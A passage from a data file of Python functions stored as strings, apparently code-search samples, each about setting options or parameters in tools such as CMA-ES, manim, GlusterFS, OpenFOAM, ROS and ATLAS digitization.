sp.mu_f = sp.popsize / 2.0 # float value of mu\r\n if opts['CMA_mu'] is not None:\r\n sp.mu_f = opts['CMA_mu']\r\n sp.mu = int(sp.mu_f + 0.499999) # round down for x.5\r\n # in principle we have mu_opt = popsize/2 + lam_mirr/2,\r\n # which means in particular weights should only be negative for q > 0.5+mirr_frac/2\r\n if sp.mu > sp.popsize - 2 * sp.lam_mirr + 1:\r\n print(\"WARNING: pairwise selection is not implemented, therefore \" +\r\n \" mu = %d > %d = %d - 2*%d + 1 = popsize - 2*mirr + 1 can produce a bias\" % (\r\n sp.mu, sp.popsize - 2 * sp.lam_mirr + 1, sp.popsize, sp.lam_mirr))\r\n if sp.lam_mirr > sp.popsize // 2:\r\n raise _Error(\"fraction of mirrors in the population as read from option CMA_mirrors cannot be larger 0.5, \" +\r\n \"theoretically optimal is 0.159\")\r\n sp.weights = log(max([sp.mu, sp.popsize / 2.0]) + 0.5) - log(1 + np.arange(sp.mu))\r\n if 11 < 3: # equal recombination weights\r\n sp.mu = sp.popsize // 4\r\n sp.weights = np.ones(sp.mu)\r\n print(sp.weights[:10])\r\n sp.weights /= sum(sp.weights)\r\n sp.mueff = 1 / sum(sp.weights**2)\r\n sp.cs = (sp.mueff + 2) / (N + sp.mueff + 3)\r\n # TODO: clean up (here the cumulation constant is shorter if sigma_vec is used)\r\n sp.dampsvec = opts['CMA_dampsvec_fac'] * (N + 2) if opts['CMA_dampsvec_fac'] else np.Inf\r\n sp.dampsvec_fading = opts['CMA_dampsvec_fade']\r\n if np.isfinite(sp.dampsvec):\r\n sp.cs = ((sp.mueff + 2) / (N + sp.mueff + 3))**0.5\r\n # sp.cs = (sp.mueff + 2) / (N + 1.5*sp.mueff + 1)\r\n sp.cc = (4 + alpha_cc * sp.mueff / N) / (N + 4 + alpha_cc * 2 * sp.mueff / N)\r\n sp.cc_sep = (1 + 1/N + alpha_cc * sp.mueff / N) / (N**0.5 + 1/N + alpha_cc * 2 * sp.mueff / N) # \\not\\gg\\cc\r\n sp.rankmualpha = opts['CMA_rankmualpha']\r\n # sp.rankmualpha = _evalOption(opts['CMA_rankmualpha'], 0.3)\r\n sp.c1 = ccovfac * min(1, sp.popsize/6) * cone((N**2 + N) / 2, sp.mueff, N) # 2. / ((N+1.3)**2 + sp.mucov)\r\n sp.c1_sep = ccovfac * conedf(N, sp.mueff, N)\r\n if 11 < 3:\r\n sp.c1 = 0.\r\n print('c1 is zero')\r\n if opts['CMA_rankmu'] != 0: # also empty\r\n sp.cmu = min(1 - sp.c1, ccovfac * cmu((N**2+N)/2, sp.mueff, sp.rankmualpha))\r\n sp.cmu_sep = min(1 - sp.c1_sep, ccovfac * cmudf(N, sp.mueff, sp.rankmualpha))\r\n else:\r\n sp.cmu = sp.cmu_sep = 0\r\n\r\n sp.neg = BlancClass()\r\n if opts['CMA_active']:\r\n # in principle we have mu_opt = popsize/2 + lam_mirr/2,\r\n # which means in particular weights should only be negative for q > 0.5+mirr_frac/2\r\n sp.neg.mu_f = popsize - (popsize + sp.lam_mirr) / 2 if popsize > 2 else 1\r\n sp.neg.weights = log(sp.mu_f + 0.5) - log(1 + np.arange(sp.popsize - int(sp.neg.mu_f), sp.popsize))\r\n sp.neg.mu = len(sp.neg.weights) # maybe never useful?\r\n sp.neg.weights /= sum(sp.neg.weights)\r\n sp.neg.mueff = 1 / sum(sp.neg.weights**2)\r\n sp.neg.cmuexp = opts['CMA_activefac'] * 0.25 * sp.neg.mueff / ((N+2)**1.5 + 2 * sp.neg.mueff)\r\n assert sp.neg.mu >= sp.lam_mirr # not really necessary\r\n # sp.neg.minresidualvariance = 0.66 # not it use, keep at least 0.66 in all directions, small popsize is most critical\r\n else:\r\n sp.neg.cmuexp = 0\r\n\r\n sp.CMA_on = sp.c1 + sp.cmu > 0\r\n # print(sp.c1_sep / sp.cc_sep)\r\n\r\n if not opts['CMA_on'] and opts['CMA_on'] not in (None,[],(),''):\r\n sp.CMA_on = False\r\n # sp.c1 = sp.cmu = sp.c1_sep = sp.cmu_sep = 0\r\n\r\n sp.damps = opts['CMA_dampfac'] * (0.5 +\r\n 0.5 * min([1, (sp.lam_mirr/(0.159*sp.popsize) - 1)**2])**1 +\r\n 2 * max([0, ((sp.mueff-1) / (N+1))**0.5 - 1]) + sp.cs\r\n )\r\n if 11 < 3:\r\n # this is worse than damps = 1 + sp.cs for the (1,10000)-ES on 40D parabolic ridge\r\n sp.damps = 0.3 + 2 * max([sp.mueff/sp.popsize, ((sp.mueff-1)/(N+1))**0.5 - 1]) + sp.cs\r\n if 11 < 3:\r\n # this does not work for lambda = 4*N^2 on the parabolic ridge\r\n sp.damps = opts['CMA_dampfac'] * (2 - 0*sp.lam_mirr/sp.popsize) * sp.mueff/sp.popsize + 0.3 + sp.cs # nicer future setting\r\n print('damps =', sp.damps)\r\n if 11 < 3:\r\n sp.damps = 10 * sp.damps # 1e99 # (1 + 2*max(0,sqrt((sp.mueff-1)/(N+1))-1)) + sp.cs;\r\n # sp.damps = 20 # 1. + 20 * sp.cs**-1 # 1e99 # (1 + 2*max(0,sqrt((sp.mueff-1)/(N+1))-1)) + sp.cs;\r\n print('damps is %f' % (sp.damps))\r\n\r\n sp.cmean = float(opts['CMA_cmean'])\r\n # sp.kappa = 1 # 4-D, lam=16, rank1, kappa < 4 does not influence convergence rate\r\n # in larger dim it does, 15-D with defaults, kappa=8 factor 2\r\n if sp.cmean != 1:\r\n print(' cmean = %f' % (sp.cmean))\r\n\r\n if verbose:\r\n if not sp.CMA_on:\r\n print('covariance matrix adaptation turned off')\r\n if opts['CMA_mu'] != None:\r\n print('mu = %f' % (sp.mu_f))\r\n\r\n # return self # the constructor returns itself\r", "def setProperty(*args):", "def setProperty(*args):", "def setProperty(*args):", "def setProperty(*args):", "def setProperty(*args):", "def setOptions(args):\n obs_dir = PATH_TO_OBS + args.loc[0] + '/Drifter/'\n\n if args.drifter:\n # if drifter files are given...\n # use specified drifter files\n if args.debug:\n print 'looking for drifter directory...'\n print '\\tgathering all files...'\n\n matfiles = [obs_dir + file for file in args.drifter]\n\n for file in matfiles:\n if not osp.exists(file) or not osp.isfile(file):\n sys.exit('problem loading matlab drifter file {}'.format(file))\n\n if args.debug:\n print '-drifter file(s) successfully identified-'\n\n elif args.dir:\n # if just an fvcom directory is given...\n # gather all drifter files in region\n if args.debug:\n print 'looking for drifter directory...'\n\n if not osp.exists(obs_dir) or not osp.isdir(obs_dir):\n sys.exit('drifter directory not found.')\n elif args.debug:\n print 'drifter directory successfully found.'\n print '\\tgathering all files...'\n\n matfiles = [obs_dir + file for file in os.listdir(obs_dir)]\n if len(matfiles) == 0:\n sys.exit('no files found in drifter directory.')\n elif args.debug:\n print '\\tall drifter files found.'\n\n if args.debug:\n print 'looking for fvcom directory...'\n\n if args.bfric:\n path2sim = PATH_TO_SIM + 'BFRIC_' + args.bfric[0] + '/'\n\n # hacky fix to an odd bug\n if args.dir[0][-1] == ':':\n args.dir[0] = args.dir[0][:-1]\n\n # locate given fvcom file\n sim_path = path2sim + args.loc[0] + '/' + args.dir[0]\n\n if not osp.exists(sim_path):\n sys.exit('the directory {} could not be located.'.format(sim_path))\n elif not osp.isdir(sim_path):\n sys.exit('{} is not a directory.'.format(sim_path))\n elif args.debug:\n print '\\tfvcom directory found. \\n\\tloading nc file...'\n\n sim_path += '/output/subdomain_' + args.loc[0] + '1_0001.nc'\n if not osp.exists(sim_path) or not osp.isfile(sim_path):\n sys.exit('fvcom file not in directory.')\n elif args.debug:\n print '\\tfvcom file successfully located.'\n\n return args.loc[0], sim_path, args.dir[0], obs_dir, matfiles, args.tight", "def define_options(self):\n\n from clinica.engine.cmdparser import PIPELINE_CATEGORIES\n\n clinica_comp = self._args.add_argument_group(PIPELINE_CATEGORIES['CLINICA_COMPULSORY'])\n clinica_comp.add_argument(\"caps_directory\",\n help='Path to the CAPS directory.')\n clinica_comp.add_argument(\"list_bvalues\", type=str,\n help='String listing all the shells (i.e. the b-values) in the corrected DWI datasets comma separated (e.g, 0,300,700,2200)')\n # Optional arguments\n clinica_opt = self._args.add_argument_group(PIPELINE_CATEGORIES['CLINICA_OPTIONAL'])\n\n clinica_opt.add_argument(\"-wd\", \"--working_directory\",\n help='Temporary directory to store pipeline intermediate results')\n clinica_opt.add_argument(\"-np\", \"--n_procs\", type=int, default=4,\n help='Number of cores used to run in parallel')\n clinica_opt.add_argument(\"-tsv\", \"--subjects_sessions_tsv\",\n help='TSV file containing a list of subjects with their sessions.')", "def updateParameters(self):\n\n return", "def update_config_with_cli(args):\n parser = make_config_parser()\n default = parser[\"CLI\"]\n\n ## Update config\n global config\n\n # Handle the *_quality flags. These determine the section to read\n # and are stored in 'camera_config'. Note the highest resolution\n # passed as argument will be used.\n quality = _determine_quality(args)\n section = parser[quality if quality != constants.DEFAULT_QUALITY else \"CLI\"]\n\n # Loop over low quality for the keys, could be any quality really\n config.update({opt: section.getint(opt) for opt in parser[\"low_quality\"]})\n\n # The -r, --resolution flag overrides the *_quality flags\n if args.resolution is not None:\n if \",\" in args.resolution:\n height_str, width_str = args.resolution.split(\",\")\n height, width = int(height_str), int(width_str)\n else:\n height = int(args.resolution)\n width = int(16 * height / 9)\n config.update({\"pixel_height\": height, \"pixel_width\": width})\n\n # Handle the -c (--background_color) flag\n if args.background_color is not None:\n try:\n background_color = colour.Color(args.background_color)\n except AttributeError as err:\n logger.warning(\"Please use a valid color.\")\n logger.error(err)\n sys.exit(2)\n else:\n background_color = colour.Color(default[\"background_color\"])\n config[\"background_color\"] = background_color\n\n config[\"use_js_renderer\"] = args.use_js_renderer or default.getboolean(\n \"use_js_renderer\"\n )\n config[\"js_renderer_path\"] = args.js_renderer_path or default.get(\n \"js_renderer_path\"\n )\n\n # Set the rest of the frame properties\n config[\"frame_height\"] = 8.0\n config[\"frame_width\"] = (\n config[\"frame_height\"] * config[\"pixel_width\"] / config[\"pixel_height\"]\n )\n config[\"frame_y_radius\"] = config[\"frame_height\"] / 2\n config[\"frame_x_radius\"] = config[\"frame_width\"] / 2\n config[\"top\"] = config[\"frame_y_radius\"] * constants.UP\n config[\"bottom\"] = config[\"frame_y_radius\"] * constants.DOWN\n config[\"left_side\"] = config[\"frame_x_radius\"] * constants.LEFT\n config[\"right_side\"] = config[\"frame_x_radius\"] * constants.RIGHT\n\n # Handle the --tex_template flag, if the flag is absent read it from the config.\n if args.tex_template:\n tex_fn = os.path.expanduser(args.tex_template)\n else:\n tex_fn = default[\"tex_template\"] if default[\"tex_template\"] != \"\" else None\n\n if tex_fn is not None and not os.access(tex_fn, os.R_OK):\n # custom template not available, fallback to default\n logger.warning(\n f\"Custom TeX template {tex_fn} not found or not readable. \"\n \"Falling back to the default template.\"\n )\n tex_fn = None\n config[\"tex_template_file\"] = tex_fn\n config[\"tex_template\"] = (\n TexTemplateFromFile(filename=tex_fn) if tex_fn is not None else TexTemplate()\n )\n\n ## Update file_writer_config\n fw_config = {}\n\n if config[\"use_js_renderer\"]:\n fw_config[\"disable_caching\"] = True\n\n if not hasattr(args, \"subcommands\"):\n fw_config[\"input_file\"] = args.file if args.file else \"\"\n fw_config[\"scene_names\"] = (\n args.scene_names if args.scene_names is not None else []\n )\n fw_config[\"output_file\"] = args.output_file if args.output_file else \"\"\n\n # Note ConfigParser options are all strings and each needs to be converted\n # to the appropriate type.\n for boolean_opt in [\n \"preview\",\n \"show_in_file_browser\",\n \"leave_progress_bars\",\n \"write_to_movie\",\n \"save_last_frame\",\n \"save_pngs\",\n \"save_as_gif\",\n \"write_all\",\n \"disable_caching\",\n \"flush_cache\",\n \"log_to_file\",\n ]:\n attr = getattr(args, boolean_opt)\n fw_config[boolean_opt] = (\n default.getboolean(boolean_opt) if attr is None else attr\n )\n # for str_opt in ['media_dir', 'video_dir', 'tex_dir', 'text_dir']:\n for str_opt in [\"media_dir\"]:\n attr = getattr(args, str_opt)\n fw_config[str_opt] = os.path.relpath(default[str_opt]) if attr is None else attr\n attr = getattr(args, \"log_dir\")\n fw_config[\"log_dir\"] = (\n os.path.join(fw_config[\"media_dir\"], default[\"log_dir\"])\n if attr is None\n else attr\n )\n dir_names = {\n \"video_dir\": \"videos\",\n \"images_dir\": \"images\",\n \"tex_dir\": \"Tex\",\n \"text_dir\": \"texts\",\n }\n for name in dir_names:\n fw_config[name] = os.path.join(fw_config[\"media_dir\"], dir_names[name])\n\n # the --custom_folders flag overrides the default folder structure with the\n # custom folders defined in the [custom_folders] section of the config file\n fw_config[\"custom_folders\"] = args.custom_folders\n if fw_config[\"custom_folders\"]:\n fw_config[\"media_dir\"] = parser[\"custom_folders\"].get(\"media_dir\")\n for opt in [\"video_dir\", \"images_dir\", \"tex_dir\", \"text_dir\"]:\n fw_config[opt] = parser[\"custom_folders\"].get(opt)\n\n # Handle the -s (--save_last_frame) flag: invalidate the -w flag\n # At this point the save_last_frame option has already been set by\n # both CLI and the cfg file, so read the config dict directly\n if fw_config[\"save_last_frame\"]:\n fw_config[\"write_to_movie\"] = False\n\n # Handle the -t (--transparent) flag. This flag determines which\n # section to use from the .cfg file.\n section = parser[\"transparent\"] if args.transparent else default\n for opt in [\"png_mode\", \"movie_file_extension\", \"background_opacity\"]:\n fw_config[opt] = section[opt]\n\n # Handle the -n flag. Read first from the cfg and then override with CLI.\n # These two are integers -- use getint()\n for opt in [\"from_animation_number\", \"upto_animation_number\"]:\n fw_config[opt] = default.getint(opt)\n if fw_config[\"upto_animation_number\"] == -1:\n fw_config[\"upto_animation_number\"] = float(\"inf\")\n nflag = args.from_animation_number\n if nflag is not None:\n if \",\" in nflag:\n start, end = nflag.split(\",\")\n fw_config[\"from_animation_number\"] = int(start)\n fw_config[\"upto_animation_number\"] = int(end)\n else:\n fw_config[\"from_animation_number\"] = int(nflag)\n\n # Handle the --dry_run flag. This flag determines which section\n # to use from the .cfg file. All options involved are boolean.\n # Note this overrides the flags -w, -s, -a, -g, and -i.\n if args.dry_run:\n for opt in [\n \"write_to_movie\",\n \"save_last_frame\",\n \"save_pngs\",\n \"save_as_gif\",\n \"write_all\",\n ]:\n fw_config[opt] = parser[\"dry_run\"].getboolean(opt)\n if not fw_config[\"write_to_movie\"]:\n fw_config[\"disable_caching\"] = True\n # Read in the streaming section -- all values are strings\n fw_config[\"streaming\"] = {\n opt: parser[\"streaming\"][opt]\n for opt in [\n \"live_stream_name\",\n \"twitch_stream_key\",\n \"streaming_protocol\",\n \"streaming_ip\",\n \"streaming_protocol\",\n \"streaming_client\",\n \"streaming_port\",\n \"streaming_port\",\n \"streaming_console_banner\",\n ]\n }\n\n # For internal use (no CLI flag)\n fw_config[\"skip_animations\"] = fw_config[\"save_last_frame\"]\n fw_config[\"max_files_cached\"] = default.getint(\"max_files_cached\")\n if fw_config[\"max_files_cached\"] == -1:\n fw_config[\"max_files_cached\"] = float(\"inf\")\n # Parse the verbosity flag to read in the log level\n verbosity = getattr(args, \"verbosity\")\n verbosity = default[\"verbosity\"] if verbosity is None else verbosity\n fw_config[\"verbosity\"] = verbosity\n logger.setLevel(verbosity)\n\n # Parse the ffmpeg log level in the config\n ffmpeg_loglevel = parser[\"ffmpeg\"].get(\"loglevel\", None)\n fw_config[\"ffmpeg_loglevel\"] = (\n constants.FFMPEG_VERBOSITY_MAP[verbosity]\n if ffmpeg_loglevel is None\n else ffmpeg_loglevel\n )\n\n # Parse the progress_bar flag\n progress_bar = getattr(args, \"progress_bar\")\n if progress_bar is None:\n progress_bar = default.getboolean(\"progress_bar\")\n fw_config[\"progress_bar\"] = progress_bar\n\n global file_writer_config\n file_writer_config.update(fw_config)", "def set_volume_options(cd):\n\n try:\n vol_name = cd[\"vol_name\"]\n auth_allow = cd[\"auth_allow\"]\n auth_reject = cd[\"auth_reject\"]\n if \"nfs_disable\" in cd:\n nfs_disable = cd[\"nfs_disable\"]\n else:\n nfs_disable = False\n if \"enable_worm\" in cd:\n enable_worm = cd[\"enable_worm\"]\n else:\n enable_worm = False\n readonly = cd[\"readonly\"]\n nfs_volume_access = cd[\"nfs_volume_access\"]\n\n vol_info_dict, err = get_basic_volume_info(vol_name)\n if err:\n raise Exception(err)\n\n # set defaults first\n _auth_allow = \"*\"\n _auth_reject = \"NONE\"\n _readonly = \"off\"\n _nfs_disable = False\n _enable_worm = False\n _nfs_volume_access = \"read-write\"\n\n if \"options\" in vol_info_dict:\n for option in vol_info_dict[\"options\"]:\n if option[\"name\"] == \"auth.allow\":\n _auth_allow = option[\"value\"]\n if option[\"name\"] == \"auth.reject\":\n _auth_reject = option[\"value\"]\n if option[\"name\"] == \"nfs.disable\":\n if option[\"value\"].lower() == \"off\":\n _nfs_disable = False\n else:\n _nfs_disable = True\n if option[\"name\"] == \"nfs.volume-access\":\n _nfs_volume_access = option[\"value\"]\n if option[\"name\"] == \"features.read-only\":\n _readonly = option[\"value\"]\n if option[\"name\"] == \"features.worm\":\n if option[\"value\"].lower() == \"enable\":\n _enable_worm = True\n else:\n _enable_worm = False\n\n # Now, for each option that has changed, set the parameter\n ret_list = []\n\n if _auth_allow != auth_allow:\n d, err = _set_volume_option(vol_name, \"auth.allow\", auth_allow)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting option for permitted access IP addresses for %s to \\'%s\\'\" % (\n vol_name, auth_allow)\n ret_list.append(d)\n\n if _auth_reject != auth_reject:\n d, err = _set_volume_option(vol_name, \"auth.reject\", auth_reject)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting option for denied access IP addresses for %s to \\'%s\\'\" % (\n vol_name, auth_reject)\n ret_list.append(d)\n\n if _readonly != readonly:\n d, err = _set_volume_option(\n vol_name, \"features.read-only\", readonly)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting readonly mount access(for all access methods) for %s to \\'%s\\'\" % (\n vol_name, readonly)\n ret_list.append(d)\n\n if readonly == \"off\":\n\n # All the rest applies only if volume access is read-write\n if _nfs_disable != nfs_disable:\n if nfs_disable:\n p = \"on\"\n else:\n p = \"off\"\n d, err = _set_volume_option(vol_name, \"nfs.disable\", p)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting NFS disable for %s to \\'%s\\'\" % (\n vol_name, p)\n ret_list.append(d)\n\n if not nfs_disable:\n # print \"in\"\n if nfs_volume_access and _nfs_volume_access != nfs_volume_access:\n d, err = _set_volume_option(\n vol_name, \"nfs.volume-access\", nfs_volume_access)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting NFS access type for %s to \\'%s\\'\" % (\n vol_name, nfs_volume_access)\n ret_list.append(d)\n\n if _enable_worm != enable_worm:\n if enable_worm:\n p = \"enable\"\n else:\n p = \"disable\"\n d, err = _set_volume_option(vol_name, \"features.worm\", p)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting feature WORM for %s to \\'%s\\'\" % (\n vol_name, p)\n ret_list.append(d)\n\n except Exception, e:\n return None, 'Error setting volume options: %s' % str(e)\n else:\n return ret_list, None", "def set_params(self, **kwargs):\n ...", "def main(docopt_args):\n\n # Notice, no checking for -h, or --help is written here.\n logger = logging.getLogger()\n logger.debug('Docopt Dictionary: %s', pp.pformat(args))\n # docopt will automagically check for it and use your usage string.\n\n if docopt_args['init']:\n get_switchports_d(docopt_args['<initcsv>'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE']\n )\n elif docopt_args['mark']:\n mark_switchports_final(docopt_args['<finalcsv>'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE'])\n elif docopt_args['move']:\n move_interfaces( docopt_args['--RUNDIR'],\n docopt_args['--RUNSHEET'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE'],\n docopt_args['<source>'],\n docopt_args['<destination>'])\n elif docopt_args['update']:\n update_switchports( docopt_args['<updatecsv>'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE'],\n docopt_args['--UPDATEDIR'],\n docopt_args['--UPDATEFILE'])\n elif docopt_args['final']:\n finalize( docopt_args['--RUNDIR'],\n docopt_args['--RUNSHEET'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE'],\n docopt_args['<source>'],\n docopt_args['<destination>'])\n\n # load_switchports()", "def RPC_DigitizationToolCommonCfg(flags, name=\"RpcDigitizationTool\", **kwargs):\n from MuonConfig.MuonCondAlgConfig import RpcCondDbAlgCfg # MT-safe conditions access\n acc = RpcCondDbAlgCfg(flags)\n if flags.Digitization.DoXingByXingPileUp:\n kwargs.setdefault(\"FirstXing\", RPC_FirstXing())\n kwargs.setdefault(\"LastXing\", RPC_LastXing())\n kwargs.setdefault(\"OutputObjectName\", \"RPC_DIGITS\")\n if flags.Digitization.PileUpPremixing:\n kwargs.setdefault(\"OutputSDOName\", flags.Overlay.BkgPrefix + \"RPC_SDO\")\n else:\n kwargs.setdefault(\"OutputSDOName\", \"RPC_SDO\")\n # config\n kwargs.setdefault(\"DeadTime\", 100)\n kwargs.setdefault(\"PatchForRpcTime\", True)\n # kwargs.setdefault(\"PatchForRpcTimeShift\", 9.6875)\n kwargs.setdefault(\"PatchForRpcTimeShift\", 12.5)\n kwargs.setdefault(\"turnON_efficiency\", True)\n kwargs.setdefault(\"turnON_clustersize\", True)\n kwargs.setdefault(\"testbeam_clustersize\", 0)\n kwargs.setdefault(\"ClusterSize1_2uncorr\", 0)\n kwargs.setdefault(\"CutProjectedTracks\", 100)\n kwargs.setdefault(\"RPCInfoFromDb\", True)\n kwargs.setdefault(\"Efficiency_fromCOOL\", True)\n kwargs.setdefault(\"EfficiencyPatchForBMShighEta\", False)\n kwargs.setdefault(\"ClusterSize_fromCOOL\", True)\n kwargs.setdefault(\"DumpFromDbFirst\", False)\n kwargs.setdefault(\"PanelId_OFF_fromlist\", False)\n kwargs.setdefault(\"PanelId_OK_fromlist\", False)\n kwargs.setdefault(\"IgnoreRunDependentConfig\", False)\n kwargs.setdefault(\"PrintCalibrationVector\",False )\n kwargs.setdefault(\"PhiAndEtaEff_A\",[0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938])\n kwargs.setdefault(\"OnlyPhiEff_A\" ,[0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022])\n kwargs.setdefault(\"OnlyEtaEff_A\" ,[0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022])\n kwargs.setdefault(\"PhiAndEtaEff_C\",[0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938])\n kwargs.setdefault(\"OnlyPhiEff_C\" ,[0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022])\n kwargs.setdefault(\"OnlyEtaEff_C\" ,[0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022])\n kwargs.setdefault(\"FracClusterSize1_A\", [0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664])\n kwargs.setdefault(\"FracClusterSize2_A\", [0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986])\n kwargs.setdefault(\"FracClusterSizeTail_A\",[0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035 ])\n kwargs.setdefault(\"MeanClusterSizeTail_A\",[0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598])\n kwargs.setdefault(\"FracClusterSize1_C\", [0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664])\n kwargs.setdefault(\"FracClusterSize2_C\", [0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986])\n kwargs.setdefault(\"FracClusterSizeTail_C\",[0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035 ])\n kwargs.setdefault(\"MeanClusterSizeTail_C\",[0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598])\n RpcDigitizationTool = CompFactory.RpcDigitizationTool\n acc.setPrivateTools(RpcDigitizationTool(name, **kwargs))\n return acc", "def runCase2(foamCase, baseCase, parameters, volumeParameters, controlParameters, options=dict(parallel=False, overwrite=True), verbose=True):\n\n status = checkIfExist(foamCase)\n if status != 2:\n #print(foamCase + ' already exists. Continue with next case ...' )\n if status ==1:\n return [] # for when the case is still running\n else:\n return [] # for when the case has finished running\n else: \n print('\\n==============================================================\\nRunning ' + foamCase + '\\n==============================================================\\n')\n\n createCase(foamCase, baseCase)\n # get old parameters. \n parameterFile = 'parameters'\n #for parameter in parameters.keys():\n # currentValue = readInput(parameterFile, parameter, foamCase)\n # parameters[parameter]=currentValue\n\n # Values to be changed\n if verbose:\n print('\\n\\nChanging section\\n\\n\\t\\tGeometry') \n for parameter in parameters.keys():\n changeInput(parameter, parameters[parameter], parameterFile, foamCase, verbose=verbose)\n\n if verbose:\n print('\\n\\t\\tVolumetric flow parameters')\n for volumeParameter in volumeParameters.keys():\n writeParameter = volumeParameter.replace('Q', 'U')\n if volumeParameter=='QNozzleIn':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], angle = 5)\n # immediately write to the spraycloudproperties file\n particleVelocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], angle = 20)\n changeInput('Upnozzle', particleVelocity.strip('uniform '), 'sprayCloudProperties', foamCase, verbose=verbose) \n elif volumeParameter=='QShieldIn':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2])\n elif volumeParameter=='QShieldOut':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], direction=[0, 1, 0])\n changeInput(volumeParameter, volumeParameters[volumeParameter][0], parameterFile, foamCase, verbose=verbose) # for visual interpretation in parameters file\n changeInput(writeParameter, velocity, 'U', foamCase, verbose=verbose) # for the inflow condition\n \n if verbose:\n print('\\n\\t\\tControl parameters ')\n for controlParameter in controlParameters.keys():\n changeInput(controlParameter, controlParameters[controlParameter], 'controlDict', foamCase, verbose=verbose)\n \n if verbose:\n print('\\n\\t\\tRunning section')\n #steps \n steps =[\n 'blockMesh',\n 'extrudeMesh',\n 'changeDictionary',\n 'createPatch',\n 'renumberMesh',\n 'checkMesh',\n 'prepare',\n 'run',\n ]\n \n checkResult = checkDicts(steps, foamCase=foamCase)\n if checkResult==1:\n print('\\n\\t\\tContinue to the next case... \\n')\n return 2\n else:\n solver = readInput('controlDict', 'application' , foamCase=foamCase)\n oldPIDs = getSolverPIDs(solver)\n runFile = foamCase + '/Allrun.sh'\n createOptimizeRunFile(runFile, steps, options, parameters)\n if verbose:\n print('\\t\\tRunning....')\n os.system(runFile + ' &') # actually run the file\n newPIDs = getSolverPIDs(solver)\n PIDs = []\n for pid in newPIDs:\n if pid not in oldPIDs:\n PIDs.append(pid)\n return PIDs", "def do_set(self,args):\n self.bindings.update(parse_kvs(re.split(' +',args)))\n print_bindings(self.bindings)", "def testcliparams(c, name=\"def\"):\n print(name)", "def update_parameters(self):\n self.alignment_factor = rospy.get_param('/dyn_reconf/alignment_factor')\n self.cohesion_factor = rospy.get_param('/dyn_reconf/cohesion_factor')\n self.separation_factor = rospy.get_param('/dyn_reconf/separation_factor')\n self.avoid_factor = rospy.get_param('/dyn_reconf/avoid_factor')\n self.max_speed = rospy.get_param('/dyn_reconf/max_speed')\n self.max_force = rospy.get_param('/dyn_reconf/max_force')\n self.friction = rospy.get_param('/dyn_reconf/friction')\n self.crowd_radius = rospy.get_param('/dyn_reconf/crowd_radius')\n self.search_radius = rospy.get_param('/dyn_reconf/search_radius')\n\n rospy.loginfo(rospy.get_caller_id() + \" -> Parameters updated\")\n if DEBUG:\n print('alignment_factor: ', self.alignment_factor)\n print('cohesion_factor: ', self.cohesion_factor)\n print('separation_factor: ', self.separation_factor)\n print('avoid_factor: ', self.avoid_factor)\n print('max_speed: ', self.max_speed)\n print('max_force: ', self.max_force)\n print('friction: ', self.friction)\n print('crowd_radius: ', self.crowd_radius)\n print('search_radius: ', self.search_radius)", "def tcset_api(c_id, options):\n tcset_options = []\n delay_set = False\n\n # settings with units\n if 'rate' in options and options['rate'] >= 0:\n if 'rate_unit' in options and options['rate_unit'] in ['Kbps', 'Mbps', 'Gbps']:\n rate_unit = options['rate_unit']\n else:\n rate_unit = 'Mbps'\n tcset_options.append('--rate ' + str(options['rate']) + rate_unit)\n\n if 'delay' in options and options['delay'] >= 0:\n delay_set = True\n if 'delay_unit' in options and options['delay_unit'] in ['usec', 'msec', 'sec', 'min']:\n delay_unit = options['delay_unit']\n else:\n delay_unit = 'msec'\n tcset_options.append('--delay ' + str(options['delay']) + 